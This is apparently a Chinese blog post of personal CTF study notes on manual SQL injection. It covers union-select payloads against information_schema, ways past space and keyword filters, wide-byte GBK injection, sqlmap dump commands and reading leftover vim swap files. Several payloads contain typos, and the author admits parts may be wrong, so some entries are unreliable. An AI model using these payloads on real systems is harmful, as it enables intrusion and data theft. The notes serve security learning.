sql 手工注入:
绕过空格的方法:
+ %0a %0b /**/
mysql:
在mysql中,有一个库叫做 information_schema,里面包含了数据库中所有库的信息,我们可以在注入的时候用它来做很多坏事情。
注入点的确定:
用select database() 来确定数据库名称 1’ union select database()’
调用information_schema 来查看所有信息,我们可以用它来做很多坏事
1’ union select table_name from information_schema.tables where table_schema =’ <数据表名>
有时候,会过滤掉你的关键词,这时候,把关键词打两遍或许有奇效。
确定字段名
1’ union select column_name from informaiton_schema.columnsa where table_name=’<字段名>
确定字段名中的内容
1’ union select from where ‘1’=’1
1’ union//select//flag from//flag where//’1’=’1
<备注:我感觉用#不太好,因为会被过滤掉,还是上头那个靠谱>
‘//union//select//flag//from/**/flag#
(注入点都用1’来代替了,具体操作都不一样。明智的人应该懂得如何手注而不是用工具)
sqlmap 搞事:
sqlmap -u”” 直接查看嘛~~ 然后加上 –dbs 倒库
(前提是你要找到注入点啊!!!)
找到库了之后呢 就 sqlmap -u “” -D <表名> –tables
(备注 -D 是进入,–tables 能够查看当前库下的东西)
然后 sqlmap -u “” -D <表名> -T <字段> <字段> –dump
(备注 –dump 能够把数据里的东西全部到出来)
(就是一次比较简单的sqlmap搞事了)
宽字节与gbk编码
注入 特征:
出现 11’ and 1=2 # 时候会变成
’ 1\’ and 1=2 # 为了把\给去掉
要改为 11%df%27 and 1=2 # /%df就是一个宽字节 %27 是引号
(可能这里理解有问题。。。。。。。。。。。。)
1’ union select 1,database()
%df’ union select 1,database() %23
vim的备份文件:
一些愚蠢的开发者会把vim的备份文件不删掉,
用/.《name》.swp 访问它
burpsuite:
简单的抓包,截包,改包操作。
对于包的熟悉能够让你做很多事情
以后burp的功能会在做题中慢慢提升
PHP 超好用的在线编译软件:
http://www.shucunwang.com/RunCode/php/
php测试在线网站
就这样随意写点觉得重要的知识点吧,可能有地方有错误的,欢迎指正哈哈。
1万+
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
